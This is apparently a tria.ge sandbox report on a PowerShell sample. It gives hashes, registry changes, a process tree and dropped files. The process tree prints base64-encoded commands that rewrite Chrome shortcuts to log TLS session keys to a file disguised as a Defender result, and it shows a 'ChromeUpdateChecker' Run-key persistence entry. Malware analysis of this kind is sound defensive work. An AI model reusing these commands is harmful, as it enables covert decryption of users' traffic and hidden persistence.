Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
25/04/2024, 08:17
Static task
static1
Behavioral task
behavioral1
Sample
malicious.ps1
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
malicious.ps1
Resource
win10v2004-20240412-en
General
-
Target
malicious.ps1
-
Size
41KB
-
MD5
b0eabea0c5a9d7805de694b90de4211a
-
SHA1
12363433de1259efd04ffa0cb569ad1874f68405
-
SHA256
9e87cc0374383be000268a7baeda2712a164d4dc8138a5218497da883adb1a61
-
SHA512
ac7f19224164c09b4ba80142a35eb68a26bac57e51108f511bff57713dfe1e1e0c512a95165a0dc1b2b951ad046fba6fafc4d535dccc93a1023615be36fd34db
-
SSDEEP
768:ww7zzQcwdAXDWAFQIkvqb+1wMm7hkmV5X0+KeFFLj4zb197:wwZXqAFlk8dMmVhV5hdjCZ97
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdateChecker = "powershell -ep Bypass -File C:\\Users\\Admin\\AppData\\Local\\Temp\\run.ps1" powershell.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4023fa36e996da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D597861-02DC-11EF-878B-CAFA5A0A62FD} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002dcc56832ee45b40af0f973e997a3e3e0000000002000000000010660000000100002000000035c8d3a0ce49321131d263611dd98fee2c0598bbf7a722b073b20d8adafadc13000000000e800000000200002000000041df49f9dc1b4c007a384bf13832dd8ce1eea79b971a877182882754f00d9a87200000008f3f933d56ce1b4cd76b051ffdfd8b6d228b2bd583eea445d1fef201c07c03324000000033abc40353241b13a49719d2ce8bfc64f102ea75141c20efbc8043300d5098efb3a6e08869ac110d86ff1637135b6ef3a86cc514b22a8b2fdfcd49efadcef00c iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002dcc56832ee45b40af0f973e997a3e3e00000000020000000000106600000001000020000000d9d732c49642bb9b129b6a06fe1caf8c93ed0366ae0a896c8a64432d9203435e000000000e8000000002000020000000cd4ff7f0f5dd1660bcf96adf316d0df62988c3482e3d5f15b03edf955b799f4c900000007bc5fcd5cb21ed9a8a0a952a6360df5cfc9cbda1d35e410b7045bad01f145f9ebf8c62b6ffbdf1ffb2b2323678081276f9b7247c6203f4b4a8c2cb4f0ab29996be3bf4ba5d9b95808af60a511de20efb25b614bfdc4521b71c638abc93b517166211a40390fbb81af35194b1bed60c4f3947c089b747eabf207854737e2d578992436854c938e91e1f17e7142c5faf34400000002a5d1b780e7020c00b9390a808b935e604e070f66ff1527a27500c7c8e5e9512463ac3a870e49e4f1923109cf138c0a295071481f7fc4f3f1c457920d8242c56 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2128 powershell.exe 2548 powershell.exe 2084 powershell.exe 2784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 2084 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2608 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2608 iexplore.exe 2608 iexplore.exe 2404 IEXPLORE.EXE 2404 IEXPLORE.EXE 2404 IEXPLORE.EXE 2404 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2548 2128 powershell.exe 29 PID 2128 wrote to memory of 2548 2128 powershell.exe 29 PID 2128 wrote to memory of 2548 2128 powershell.exe 29 PID 2128 wrote to memory of 2084 2128 powershell.exe 30 PID 2128 wrote to memory of 2084 2128 powershell.exe 30 PID 2128 wrote to memory of 2084 2128 powershell.exe 30 PID 2084 wrote to memory of 2608 2084 powershell.exe 31 PID 2084 wrote to memory of 2608 2084 powershell.exe 31 PID 2084 wrote to memory of 2608 2084 powershell.exe 31 PID 2608 wrote to memory of 2404 2608 iexplore.exe 33 PID 2608 wrote to memory of 2404 2608 iexplore.exe 33 PID 2608 wrote to memory of 2404 2608 iexplore.exe 33 PID 2608 wrote to memory of 2404 2608 iexplore.exe 33 PID 2128 wrote to memory of 2784 2128 powershell.exe 34 PID 2128 wrote to memory of 2784 2128 powershell.exe 34 PID 2128 wrote to memory of 2784 2128 powershell.exe 34
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malicious.ps11⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand ZgBvAHIAZQBhAGMAaAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAIABpAG4AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAALQBJAG4AYwBsAHUAZABlACAAKgAuAGwAbgBrACkAewAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsADsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0AJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAEMAcgBlAGEAdABlAFMAaABvAHIAdABjAHUAdAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAKQA7AGkAZgAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAFQAYQByAGcAZQB0AFAAYQB0AGgAIAAtAG0AYQB0AGMAaAAgACcAYwBoAHIAbwBtAGUAXAAuAGUAeABlACQAJwApAHsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAC4AQQByAGcAdQBtAGUAbgB0AHMAPQAiAC0ALQBzAHMAbAAtAGsAZQB5AC0AbABvAGcALQBmAGkAbABlAD0AJABlAG4AdgA6AFQARQBNAFAAXABkAGUAZgBlAG4AZABlAHIALQByAGUAcwAuAHQAeAB0ACIAOwAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIALgBTAGEAdgBlACgAKQA7AH0AfQAKAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAATQBhAHgAaQBtAGkAegBlAGQAIABoAHQAdABwAHMAOgAvAC8AaABlAGwAbABvAC4AcwBtAHkAbABlAHIALgBuAGUAdAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://hello.smyler.net/3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2608 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2404
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b1e6206564afafa0ad318005175d16f0
SHA158813e96526e5f9f0b43dcbca8fe9e599664262e
SHA256cb7933068db93c9c3097388666280766e7c4df596b2c09035c55ff4177c9b684
SHA5120c3937609e19ac285fd43e283a584c2da1fe73f6fb52eb7389125a052cc65904fc9b8c7250145cf838e1584240c962629eb2aeca0caa41287b5d5382746e44ca
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD531cf61f49aed106f71b154dc5b0dc2eb
SHA157f8ea611ec81e80000ab7d391e7b7dc85e779a0
SHA256cacd2aaed908f76eef366f13d6433147645100c33f5f5f02156dc84031872e1f
SHA512da0555057ecb646922457367af8faf9696b2bfc5508959b177714d366aa7aca2cb9fcc5e8825ba6ed4851f9c23cd689fdd61fed21ca51d3f21b8460a2551f05d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f7d32ae945308c028298287bd88abe6c
SHA199e580e577da39e748fd259fa487371bfe0d6dbb
SHA2562e83a1b38e09ec0d61d5d67d18d13c959673a914621dfc5e3901202245a2a1bd
SHA51229d579e6105730fe8ccda29da8be6151b48fca2f1eb6bd4e3610569578effed193101c5c885984350f3b40bf20924de5f77ebaa7310f1170b0257b5884a5f7f0
-
Filesize
1KB
MD58fae3861f677178e6c739f41b97b6e0c
SHA19caf3322035228492d662d179d2fe5a9e4fb40d5
SHA25687185a16a7f4b23b40cddf910aa0ea60dc9700ffa8297b2d2b2a43372b716a15
SHA512888284de50c6bb654d93a49c8aa51a9909aa88a468c533a2a310818e51a6bceccce3cf26c31597b773e69ed1f247192bb36375a22c0441f01c4732f92efab1cd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8ADCJI8Z\favicon[1].ico
Filesize1KB
MD5f2a495d85735b9a0ac65deb19c129985
SHA1f2e22853e5da3e1017d5e1e319eeefe4f622e8c8
SHA2568bb1d0fa43a17436d59dd546f6f74c76dc44735def7522c22d8031166db8911d
SHA5126ca6a89de3fa98ca1efcf0b19b8a80420e023f38ed00f4496dc0f821cea23d24fb0992cee58c6d089f093fdefca42b60bb3a0a0b16c97b9862d75b269ae8463b
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
58KB
MD5ecee6cc4e0bf90b7f0584a25788af710
SHA129ee18dfa7b14336070ce8ba73af3ac12a50b19a
SHA256990c2addcb8712bf9e3f246d73045f8dc33ebbe42fa8297fa3a504e11d8f067c
SHA512050690ba9a389a361a29bdc66e1925d8f241bdc96add1180ee2709e9c8962c59f4e4dfd3295b18b71310cd8dd2cfff052c1e2dbe5c1e38bd818121ca6e6f9e9b
-
Filesize
16KB
MD50c164dbadd246bea70980aec1840e179
SHA141f12d48807416d719b9b2ceace14549923d0538
SHA25651c76f11fed46ce01fce9d534d61c3b2b5ea26ec31d01e769c6116f534a47ac6
SHA512e728fa13dcdf7a3e3704a53b332aac744101820c0e841cdbebb96a52b1a4f726708385d3b3c7f58a296fd71eaf6e25ef8c97824a33dca6d8bcff1b307df0e80e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58b5d2bbeacd4f7c4836cc2ab2d4293f0
SHA17f8f10e8757eb58acee81406a195135c7ef0001b
SHA256424c03f8637cbbe2e9971e12647b8ba2d4e3f2dc6cf632493b40c07717d93d0b
SHA5127a89cd993478e245c1ee00ae5c2c143dfade2b2c00398e8b6cae741eb6f5efd7a780085c61e3c3738190922515cbd609481e345dc79b76e7249447f427dc85e0